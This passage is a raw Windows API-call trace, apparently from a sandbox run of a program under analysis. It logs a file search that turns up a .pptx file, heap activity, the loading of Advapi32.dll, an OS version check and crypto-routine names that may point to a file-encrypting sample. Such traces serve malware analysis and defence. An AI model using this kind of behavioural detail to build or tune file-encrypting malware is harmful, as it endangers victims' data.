ftLastWriteTime.dwLowDateTime=0x1ad4e820, ftLastWriteTime.dwHighDateTime=0x1d5743f, nFileSizeHigh=0x0, nFileSizeLow=0x15bd9, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="BGmPJ_.pptx", cAlternateFileName="BGMPJ_~1.PPT")) returned 0xa87550 [0259.907] FindClose (in: hFindFile=0xa87550 | out: hFindFile=0xa87550) returned 1 [0259.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0259.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0259.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0259.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0259.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0259.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0259.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.908] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.908] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0259.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.908] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.908] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0259.908] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0259.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0259.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0259.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0259.909] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.910] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0259.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0259.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0259.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.910] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.910] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0259.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.910] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0259.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0259.911] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.912] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0259.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0259.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.912] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0259.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.913] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0259.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0259.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0259.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.914] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0259.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.914] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.914] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0259.915] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0259.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: 